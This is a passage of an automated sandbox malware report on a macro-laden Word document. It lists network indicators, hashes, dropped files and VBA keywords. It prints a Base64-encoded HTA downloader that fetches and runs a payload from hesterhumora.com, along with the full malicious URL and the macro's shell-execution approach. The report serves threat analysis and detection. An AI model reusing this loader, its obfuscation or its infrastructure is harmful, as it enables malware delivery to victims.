rowse?cp=Bing https://skyapi.live.net/Activity/ 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://clients.config.office.net/user/v1.0/mac 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://dataservice.o365filtering.com 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://api.cortana.ai 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe https://onedrive.live.com 51FE3752-6560-4F0C-ADCF-098B90 false high 28BD48.0.dr https://ovisualuiapp.azurewebsites.net/pbiagave/ 51FE3752-6560-4F0C-ADCF-098B90 false Avira URL Cloud: safe unknown 28BD48.0.dr https://visio.uservoice.com/forums/368202-visio-on- 51FE3752-6560-4F0C-ADCF-098B90 false high devices 28BD48.0.dr https://directory.services. 51FE3752-6560-4F0C-ADCF-098B90 false URL Reputation: safe unknown 28BD48.0.dr URL Reputation: safe URL Reputation: safe

Contacted IPs

25% < No. of IPs < 50% 50% < No. of IPs < 75% 75% < No. of IPs

Public

IP Domain Country Flag ASN ASN Name Malicious 193.203.203.235 hesterhumora.com Russian Federation 200521 SEAP-AGEES false

Private

IP 192.168.2.1

General Information

Joe Sandbox Version: 32.0.0 Black Diamond Analysis ID: 401458 Start date: 30.04.2021 Start time: 17:06:17 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 6m 5s Hypervisor based Inspection enabled: false Report type: light Sample file name: 25aabd25_by_Libranalysis.docm Cookbook file name: defaultwindowsofficecookbook.jbs Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 Run name: Potential for more IOCs and behavior Number of analysed new started processes analysed: 30 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0

Copyright Joe Security LLC 2021 Page 14 of 49 Technologies: HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled Analysis Mode: default Analysis stop reason: Timeout Detection: MAL Classification: mal80.expl.evad.winDOCM@8/12@1/2 EGA Information: Failed HDC Information: Failed HCA Information: Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0 Cookbook Comments: Adjust boot time Enable AMSI Found application associated with file extension: .docm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer Warnings: Show All Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 104.42.151.234, 52.109.88.177, 52.109.12.23, 20.50.102.62, 184.30.24.56, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 52.155.217.156, 13.107.42.23, 13.107.5.88, 20.54.26.129 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, client-office365- tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, e- 0009.e-msedge.net, config-edge-skype.l-0014.l- msedge.net, fs- wildcard.microsoft.com.edgekey.net, fs- wildcard.microsoft.com.edgekey.net.globalredir.aka dns.net, a1449.dscg2.akamai.net, l- 0014.config.skype.com, arc.msn.com, consumerrp- displaycatalog-aks2eap- europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadn s.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt- microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg- shim.trafficmanager.net, config.edge.skype.com, displaycatalog- europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, afdo-tas- offload.trafficmanager.net, displaycatalog-rp- europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris- prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ocos- office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, l- 0014.l-msedge.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

No simulations

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 193.203.203.235 25aabd25_by_Libranalysis.docm Get hash malicious Browse hesterhum ora.com/dg sos/75632/ esKeMcrysd SzRdoJ4pQ1 HwyTQMok5T G/51252/27 076/law6?v c=4eyoNNPx t2YQPjsp3& OUMP=Aa93N &user=MYqj fAOnpCOmZr UkdR

Domains

No context

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context SEAP-AGEES 25aabd25_by_Libranalysis.docm Get hash malicious Browse 193.203.20 3.235 dettare-04.22.2021.doc Get hash malicious Browse 193.203.203.64 dettare-04.22.2021.doc Get hash malicious Browse 193.203.203.64 Overdue-486523561-04212021.xlsm Get hash malicious Browse 193.203.202.55

Overdue-894289303-04212021.xlsm Get hash malicious Browse 193.203.202.55 Overdue-486523561-04212021.xlsm Get hash malicious Browse 193.203.202.55 Overdue-894289303-04212021.xlsm Get hash malicious Browse 193.203.202.55 Overdue-486523561-04212021.xlsm Get hash malicious Browse 193.203.202.55 Overdue-894289303-04212021.xlsm Get hash malicious Browse 193.203.202.55 der vorschlag.doc Get hash malicious Browse 193.203.203.33 der vorschlag.doc Get hash malicious Browse 193.203.203.33 der vorschlag.doc Get hash malicious Browse 193.203.203.33 Eg9OT4rRLF.exe Get hash malicious Browse 193.203.20 3.138 documento-03.26.2021_9657652.doc Get hash malicious Browse 193.203.20 3.245 documento-03.26.2021_9657652.doc Get hash malicious Browse 193.203.20 3.245 raccontare-03.21_65537264.doc Get hash malicious Browse 193.203.203.16 raccontare-03.21_65537264.doc Get hash malicious Browse 193.203.203.16 documento-03.26.2021_9657652.doc Get hash malicious Browse 193.203.20 3.245 dettagli.03.16.2021.doc Get hash malicious Browse 193.203.203.17 dettagli.03.16.2021.doc Get hash malicious Browse 193.203.203.17

JA3 Fingerprints

No context

Dropped Files

No context

C:\Users\Public\valuePasteList.hta

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: HTML document, ASCII text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 2884 Entropy (8bit): 5.8589412056450065 Encrypted: false SSDEEP: 48:77gi2hswudGQvzwHKM/G1kC3GkQTR0ZUIIMvWicEXYmCVCoqogFxvRm:77gi2hswudGUwqYgD3cCUIIMvHHXYmc/ MD5: 4AE917E70279FC83CEB95DEF066CD872 SHA1: 1384378C5F59C873063F8FD22FAB6B22B7853034 SHA-256: 1417ABB6FA24644BAD48C77B5A4584C48534967C7355245FCA50E08B9B66AAFF SHA-512: 4911F676D0AB2A9D52B6175EC591DA043D89CCB971F1CD697452331DBCE93A4D3D8FA004D5277A9814A5203C8E30F75AD3F0A4D0EEA434D8CB39563AD93B963 B Malicious: true Reputation: low Preview:

fTtlc29sYy50bmVtdWdyQWVzYWJhdGFEdHhlbjspMiAsImdwai50c2lMZXRzYVBldWxhdlxcY2lsYnVwXFxzcmVzdVxcOmMiKGVs aWZvdGV2YXMudG5lbXVnckFlc2FiYXRhRHR4ZW47KXlkb2Jlc25vcHNlci5iVnlyZXVRcmFlbGMoZXRpcncudG5lbXVnckFlc2FiYXRhRHR4ZW47MSA9IGVweXQudG5lbX VnckFlc2FiYXRhRHR4ZW47bmVwby50bmVtdWdyQWVzYWJhdGFEdHhlbjspIm1hZXJ0cy5iZG9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB0bmVtdWdyQWVzYW JhdGFEdHhlbiByYXZ7KTAwMiA9PSBzdXRhdHMuYlZ5cmV1UXJhZWxjKGZpOykoZG5lcy5iVnlyZXVRcmFlbGM7KWVzbGFmICwiUmRrVXJabU9DcG5PQWZqcV lNPXJlc3UmTjM5YUE9UE1VTyYzcHNqUFFZMnR4UE5Ob3llND1jdj82d2FsLzY3MDcyLzI1MjE1L0dUNWtvTVFUeXdIMVFwNEpvZFJ6U2RzeXJjTWVLc2UvMj M2NTcvc29zZ2QvbW9jLmFyb211aHJldHNlaC8vOnB0dGgiICwiVEVHIihuZXBvLmJWeXJldVFyYWVsYzspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9 IGJWeXJldVFyYWVsYyByYXY=|fXspcmV0bmlvUG9wZVJ5cm9tZW0oaGN0YWN9OykiYXRoLnRzaUxldHNhUGV1bGF2XFxjaWxidXBcXHNyZXN1XFw6YyIoZWx pZmV0ZWxlZC5ub2l0cGVjeEV5YXJyYXt5cnQ7KSJ0Y2VqYm9tZXRzeXNlbGlmLmduaXRwaXJjcyIodGNlamJPWGV2aXRjQSB3ZW4gPSBub2l0cGVjeEV5YXJ yYSByYXY7K

C:\Users\Public\valuePasteList.jpg Process: C:\Windows\SysWOW64\mshta.exe File Type: HTML document, ASCII text Category: dropped Size (bytes): 203 Entropy (8bit): 5.1361237488648435 Encrypted: false SSDEEP: 6:pn0+Dy9xwGObRmEr6VnetdzRx3FXGKCezocKqD:J0+oxBeRmR9etdzRxOez1T MD5: E3860343F8E372A656101CF4E93A7005 SHA1: A5DD413F449E60041A26AB3DD325972291851ACD SHA-256: 2A90E466330DF94118A6F812FC94E334BEC6DA035FE11936F0EA744616632522 SHA-512: CD460C8315061E5D0F91062A20E51EEC90683168B02EC52B22E5743A0461D4E47898D66CAD09E2FD0ED9D60DA3A53B3CA5B4C906F7EEAB5959B2366AB2BD833 4 Malicious: false Reputation: low Preview: ..404 Not Found..

Not Found

The requested URL "la w6" was not found on this server.

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\51FE3752-6560-4F0C-ADCF-098B9028BD48 Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators Category: dropped Size (bytes): 134558 Entropy (8bit): 5.36840385534488 Encrypted: false SSDEEP: 1536:HcQIKNEHBXA3gBwlpQ9DQW+zhh34ZldpKWXboOilX5ErLWME9:sEQ9DQW+zPXO8 MD5: 40817FEB2EBBD8220D604C87586D7FCF SHA1: 46E3010EBCBBD3DA3DD9467BF62349E6339E169E SHA-256: 3C1F4DA023ED8E66F0096F7846FB2F856D14B2E3194212E0BA854D1253A2DFF0 SHA-512: AE2A9B48AFC67CF3849AD7EDEED41535F6B4776044C7C3E2D68698E6A6E29E664C6FB4A9BEB2BCC76E3F13DE4E1697E8200C5BF393D1DACA2AE1AC7533164 D0B Malicious: false Reputation: low Preview: .... .. Build: 16.0.14028.30527-->.. .. .. .. .. https://rr.office.microsoft.com/research/query.asmx.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://o15.officeredir.microsoft.com/r.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://[MAX.BaseHost]/client/results.. .. .. https://ocsa.office.microsoft.com/client/15/help/template.. ..

Copyright Joe Security LLC 2021 Page 17 of 49 C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DD65E6CC.gif Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: GIF image data, version 89a, 1082 x 217 Category: dropped Size (bytes): 55598 Entropy (8bit): 7.895939785737012 Encrypted: false SSDEEP: 1536:fxDjV+l0rM81NCGCPisEHOAq4eyO6i1itW7YUvOMkksCLK:JnnrxRCPdYZuyL3t5UmMkkk MD5: 5F853B52C1FA08003536A552542F5BAA SHA1: 476781A3E1DA98354B835ACE6079146F0BBB391E SHA-256: 1186DC7E0AE0CFA11BBD14277048028C97F96EF30DAB4D26958B09D540C8C708 SHA-512: AD729D4E9D4F5E9F0E07A808103FEEEE8671A73CA2C3F13706EE33C34679717542CFB759E680CADEFF60CD61933203599353FB56E4163CD370DB8B018BB52B5B Malicious: false Preview: GIF89a:...... 4. 4..4...... [email protected]..<.&=.0L.....4..4..<..*h...... D..C..<..<..L..1t.<.-\.%}..M.7.\9c..]...p..K...v...... k..../..}..^]....#K.L....3k6:S&.x

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0076817D-35EC-4844-8605-85E02B075446}.tmp Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: data Category: dropped Size (bytes): 1536 Entropy (8bit): 0.1903644670878318 Encrypted: false SSDEEP: 3:/lMlt4slllFlNtO0L:+lrWU MD5: 96F49CDC0E837296C17EC20F53742D64 SHA1: A6781C5043149A7612E3812646409D2FA58E008C SHA-256: CD7950A71BDE874B4644682F2C0DEBAF0ED9FCDC88E09B1CEB6E3BF9DB670485 SHA-512: 0ED7A89D92F9B4661DA13F5551E1D5698F4C829A1AAB988E0A3F50C16198A058F77E0ED2C8E6148B585680C82755F481B2EDCF53302D8048A44F08F8E709F144 Malicious: false Preview: ......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{883A0CD4-68F7-4E0B-B3FD-D65D55DCC0D9}.tmp Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: data Category: dropped Size (bytes): 1024 Entropy (8bit): 0.05390218305374581 Encrypted: false SSDEEP: 3:ol3lYdn:4Wn MD5: 5D4D94EE7E06BBB0AF9584119797B23A SHA1: DBB111419C704F116EFA8E72471DD83E86E49677 SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28B A4 Malicious: false Preview: ......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\law6[1].htm Process: C:\Windows\SysWOW64\mshta.exe File Type: HTML document, ASCII text Category: downloaded Size (bytes): 203 Entropy (8bit): 5.1361237488648435 Encrypted: false SSDEEP: 6:pn0+Dy9xwGObRmEr6VnetdzRx3FXGKCezocKqD:J0+oxBeRmR9etdzRxOez1T MD5: E3860343F8E372A656101CF4E93A7005 SHA1: A5DD413F449E60041A26AB3DD325972291851ACD

Copyright Joe Security LLC 2021 Page 18 of 49 C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\law6[1].htm SHA-256: 2A90E466330DF94118A6F812FC94E334BEC6DA035FE11936F0EA744616632522 SHA-512: CD460C8315061E5D0F91062A20E51EEC90683168B02EC52B22E5743A0461D4E47898D66CAD09E2FD0ED9D60DA3A53B3CA5B4C906F7EEAB5959B2366AB2BD833 4 Malicious: false IE Cache URL: hesterhumora.com/dgsos/75632/esKeMcrysdSzRdoJ4pQ1HwyTQMok5TG/51252/27076/law6? vc=4eyoNNPxt2YQPjsp3&OUMP=Aa93N&user=MYqjfAOnpCOmZrUkdR Preview: ..404 Not Found..

Not Found

The requested URL "la w6" was not found on this server.

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: data Category: dropped Size (bytes): 170164 Entropy (8bit): 4.369761139622616 Encrypted: false SSDEEP: 3072:f0g64og8WpFpKKHHedydFeo+oQLUlPoK0:f0g/oB0FpTHHIydFeo+oIUlPoK0 MD5: D4C0E04DCA7925799B92026FD919B8B7 SHA1: 56FC7BB23154498F9584342566A1AA8ED8C42366 SHA-256: FDFF1CC93BF0F2A53B9EE6FB0C5CAF4908169CE9D1177ADB52DA733C118972E5 SHA-512: DB64606E8920D444D6D1454081D24D0079617664DD243DA81FC42DF61A11896E18992B4E4D9B9B6A83622FE44DF64296553A97FBCB6E7CA47C248413CB58E1F9 Malicious: false Preview: MSFT...... Q...... $...... $...... d...... ,...... X...... L...... x...... @...... l...... 4...... `...... (...... T...... H...... t...... <...... h...... 0...... \...... $...... P...... |...... D...... p...... 8...... d...... ,...... X...... L...... x...... @...... l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&.. .&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-...... |...... D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. [email protected]:...:...:..`;...;.. (<...<...<..T=...=...>...>...>[email protected]@...@..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\25aabd25_by_Libranalysis.docm.LNK

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Fri Apr 30 23:07:34 2021, atime=Fri Apr 30 23:07:30 2021, length=82318, window=hide Category: dropped Size (bytes): 2260 Entropy (8bit): 4.709201042110935 Encrypted: false SSDEEP: 48:8pYkuQOENTkNvOEC1B6ppYkuQOENTkNvOEC1B6:8nuQFqNvFC1KnuQFqNvFC1 MD5: 38CF5911111FC2CB02A2461F5AA3015A SHA1: 5D257832144B07C5D50411DFAF14F46BD9BD8A1A SHA-256: 907BFDE83BB91D68A94EBC24BCBB54F449CDE55B02FBDFDEE287CF28FD53B8B3 SHA-512: 641EBCC72987BC5CC363D4ACACD5FFC1F23D32AE4C8740808AB97EB73047473633054D799CA681B905A50A347EF5AA3CCCF1E5B3821BB45138C3D6797C42C79 6 Malicious: true Preview: L...... F...... f.:.....o..>..Su...>...A...... P.O. .:i.....+00.../C:\...... x.1...... N....Users.d...... L...R...... :.....q|[email protected].,.- .2.1.8.1.3.....P.1.....>Qxx..user.<...... Ny..R...... S...... h.a.r.d.z.....~.1.....>Qyx..Desktop.h...... Ny..R...... Y...... >.....'[email protected].,.-.2 .1.7.6.9...... 2..A...R.. .25AABD~1.DOC..l...... >Qwx.R...... h...... 2.5.a.a.b.d.2.5._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.m...... c...... -...... b...... >.S...... C:\Use rs\user\Desktop\25aabd25_by_Libranalysis.docm..4.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.5.a.a.b.d.2.5._.b.y._.L.i.b.r.a.n.a.l.y.s.i.s...d.o.c.m...... :..,.LB.)...As...`...... X...... 980108...... !a..%.H.VZAj...... -...... -..!a..%.H.VZAj...... -...... -...... 1SPS.XF.L8C....&.m.q...... /...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: ASCII text, with CRLF line terminators Category: dropped Size (bytes): 127 Entropy (8bit): 4.495810970496746 Encrypted: false SSDEEP: 3:Hh1G6uHUwSLMBKdrSZEHG6uHUwSLMBKdrSmxWh1G6uHUwSLMBKdrSv:Hhbu0NLdRNu0NLdCbu0NLdI MD5: 4D93A7A2FED78E0699FDE5F631B4A425 SHA1: E9336D9F32A018289ADB2D05C7EE51F16348B5B3 SHA-256: D2F91C4488D06A4180449C33655B997A53C81B78CC0F3A45F858DB4D4385F195 SHA-512: E48B9429B807A4EAB4CD2BCD4484CEBCFC95CA712F4CA00E73E9FCEF12E2F5B8C6FB34C13BCEF194DAB1D0B7769868A95D6AA032D226F58928EFC9EAA6B2 BC27 Malicious: false Preview: [misc]..25aabd25_by_Libranalysis.docm.LNK=0..25aabd25_by_Libranalysis.docm.LNK=0..[misc]..25aabd25_by_Libranalysis.docm.LNK=0..

Copyright Joe Security LLC 2021 Page 19 of 49 C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: data Category: dropped Size (bytes): 162 Entropy (8bit): 2.5669409255645634 Encrypted: false SSDEEP: 3:Rl/ZdgkhGhRElpztl9lqKJsRXoln:RtZRAkldtISs6n MD5: B7F99051D48E6CAF22563D3CA7C97861 SHA1: 409D1D944CBA2D89DF888F07C6DE5E5D3B0C54A9 SHA-256: FA2EF7237F946D92212B9130843CE2B41F9F50ED225E79D5DD437CAD898D2F5D SHA-512: C36CE7BB05424F82327CEB89924CDDF938EFB3DE66E189AD43B2A5756FC0DF0F2B923BF9CB903E41FD6BFC710D0DE1FD1E49F49670CDB9CB33E2359DD346D9 A2 Malicious: false Preview: .pratesh...... p.r.a.t.e.s.h...... x..t`..tP..t...... $...... 6C......

C:\Users\user\Desktop\~$aabd25_by_Libranalysis.docm Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File Type: data Category: dropped Size (bytes): 162 Entropy (8bit): 2.5669409255645634 Encrypted: false SSDEEP: 3:Rl/ZdgkhGhRElpztl9lqKJsRXoln:RtZRAkldtISs6n MD5: B7F99051D48E6CAF22563D3CA7C97861 SHA1: 409D1D944CBA2D89DF888F07C6DE5E5D3B0C54A9 SHA-256: FA2EF7237F946D92212B9130843CE2B41F9F50ED225E79D5DD437CAD898D2F5D SHA-512: C36CE7BB05424F82327CEB89924CDDF938EFB3DE66E189AD43B2A5756FC0DF0F2B923BF9CB903E41FD6BFC710D0DE1FD1E49F49670CDB9CB33E2359DD346D9 A2 Malicious: false Preview: .pratesh...... p.r.a.t.e.s.h...... x..t`..tP..t...... $...... 6C......

Static File Info

General File type: Microsoft Word 2007+ Entropy (8bit): 7.865778964362989 TrID: Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99% Word Microsoft Office Open XML Format document (49504/1) 32.35% Word Microsoft Office Open XML Format document (43504/1) 28.43% ZIP compressed archive (8000/1) 5.23% File name: 25aabd25_by_Libranalysis.docm File size: 82318 MD5: 25aabd2540a1f7bf337436939eff50d3 SHA1: 85f6b809a81a361d45a952e7eb95f128f858397d SHA256: efb29655c57e8dc84defbc6bba89feb9a8bf3ca75ada492 9c338de7404a5df08 SHA512: 94173a37103966bdb91830dcd7100eebe2f5bc169dbfa76 f2a91e67f94fe04151787c3ca3916cdc409c60403f2cb28 402321d205a658defc026d9f8028ac5793 SSDEEP: 1536:Kwt18fPeGe94wxhxDjV+l0rM81NCGCPisEHOAq 4eyO6i1itW7YUvOMkksCLYA09n:KI183eGe94wxfnnrx RCPdYZuyL3t5Umr File Content Preview: PK...... !....h....c...... [Content_Types].xml ...(......

File Icon

Static OLE Info

General Document Type: OpenXML Number of OLE Files: 1

OLE File "/opt/package/joesandbox/database/analysis/401458/sample/25aabd25_by_Libranalysis.docm"

Indicators Has Summary Info: False Application Name: unknown Encrypted Document: False Contains Word Document Stream: Contains Workbook/Book Stream: Contains PowerPoint Document Stream: Contains Visio Document Stream: Contains ObjectPool Stream: Flash Objects Count: Contains VBA Macros: True

Summary Title: ath.tsiLetsaPeulav\cilbup\sresu\:c rerolpxe Subject: Author: tcdjlmp Keywords: Template: Normal Last Saved By: Пользовате ль Windows Revion Number: 2 Total Edit Time: 0 Create Time: 2021-04-30T07:30:00Z Last Saved Time: 2021-04-30T07:30:00Z Number of Pages: 1 Number of Words: 0 Number of Characters: 0 Creating Application: Microsoft Office Word Security: 4

Document Summary Number of Lines: 2 Number of Paragraphs: 0 Thumbnail Scaling Desired: false Company: Contains Dirty Links: false Shared Document: false Changed Hyperlinks: false Application Version: 16.0000

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1307

General Stream Path: VBA/ThisDocument VBA File Name: ThisDocument.cls Stream Size: 1307 Data ASCII: ...... X ...... p . . . . . < . . T $ V . D . . J Q . . - . . . . e . e A @ . . 2 ...... C . H . e x . f . . q ...... x ...... C . H . e x . f . . q < . . T $ V . D . . J Q . . - ...... M E ......

Copyright Joe Security LLC 2021 Page 21 of 49 General Data Raw: 01 16 03 00 06 00 01 00 00 8c 03 00 00 e4 00 00 00 ea 01 00 00 ba 03 00 00 c8 03 00 00 58 04 00 00 01 00 00 00 01 00 00 00 a3 2e d1 f0 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 3c bc 0d 54 24 56 c2 44 ad c8 4a 51 fe 1a 2d 97 a2 86 da 65 df 65 41 40 ad cb 32 05 e8 8c 95 b8 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword False VB_Exposed Attribute VB_Creatable VB_Name Document_Open() VB_PredeclaredId VB_GlobalNameSpace VB_Base VB_Customizable VB_TemplateDerived "ThisDocument"

VBA Code

VBA File Name: arrayCopy.cls, Stream Size: 1490

General Stream Path: VBA/arrayCopy VBA File Name: arrayCopy.cls Stream Size: 1490 Data ASCII: ...... u ...... x ...... M E ...... Data Raw: 01 16 03 00 00 f0 00 00 00 8a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 91 03 00 00 75 04 00 00 00 00 00 00 01 00 00 00 a3 2e f9 ea 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword String, String) VB_Name VB_Creatable VB_Exposed Print Public Function Option counterSizeValue Close VB_Customizable pasteVbArray(constSelectGeneric Explicit "arrayCopy" Output VB_TemplateDerived False Attribute VB_PredeclaredId VB_GlobalNameSpace constSelectGeneric VB_Base

VBA File Name: bufferTmpRequest.bas, Stream Size: 2002

General Stream Path: VBA/bufferTmpRequest VBA File Name: bufferTmpRequest.bas Stream Size: 2002 Data ASCII: ...... : ...... ~ ...... x ...... M E ...... Data Raw: 01 16 03 00 00 f0 00 00 00 02 04 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 04 00 00 3a 06 00 00 00 00 00 00 01 00 00 00 a3 2e 7e 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword procQueryTmp nextTrustSwap VB_Name main() Function String windowBufPointer procQueryTmp.pasteVbArray "bufferTmpRequest" titleNamespace() Len(countAProc) sr(countAProc) StrReverse(countAProc) Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), titleNamespace argumentResponse, argumentResponse Attribute countAProc gwc(countAProc) arrayCopy

VBA Code

VBA File Name: frm.frm, Stream Size: 1661

General Stream Path: VBA/frm VBA File Name: frm.frm Stream Size: 1661 Data ASCII: ...... L ...... e ...... x ...... M E ...... Data Raw: 01 16 03 00 00 f0 00 00 00 ae 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff b5 03 00 00 e1 04 00 00 00 00 00 00 01 00 00 00 a3 2e 65 b5 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword ActiveDocument.BuiltInDocumentProperties("title") VB_Name VB_Creatable

Copyright Joe Security LLC 2021 Page 23 of 49 Keyword VB_Exposed CreateObject("wscript.shell") Public dataMemory VB_Customizable .exec$ "frm" VB_TemplateDerived (sr(dataMemory)) constLenLoad False Attribute VB_PredeclaredId VB_GlobalNameSpace VB_Base

VBA Code

VBA File Name: indexPasteConvert.bas, Stream Size: 8002

General Stream Path: VBA/indexPasteConvert VBA File Name: indexPasteConvert.bas Stream Size: 8002 Data ASCII: ...... 0 ...... x ...... M E ...... Data Raw: 01 16 03 00 00 f0 00 00 00 ba 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff c1 04 00 00 e9 14 00 00 00 00 00 00 01 00 00 00 a3 2e c6 30 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword counterRightPaste dataProcedure('tA" procedure" "Index(queryStorage){return(new refNamespace(bufDatabase) ">collectionIterator "/div>

function refNamespace("oint") ExTable valueLeft("istb") swapNamespace(" language='vbscript'" windowBufPointer() id='t" "amespace()[dataLink](i)]=i;}for(" "ript>

Copyright Joe Security LLC 2021 Page 25 of 49 Keyword "rn(leftOptionBuffer);};function "ctiveXObject(queryStorage));}fun" "tionReferencePointer['AddCode'](" responseLink(bufDatabase) "L;var

VBA Code

Streams

Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 627

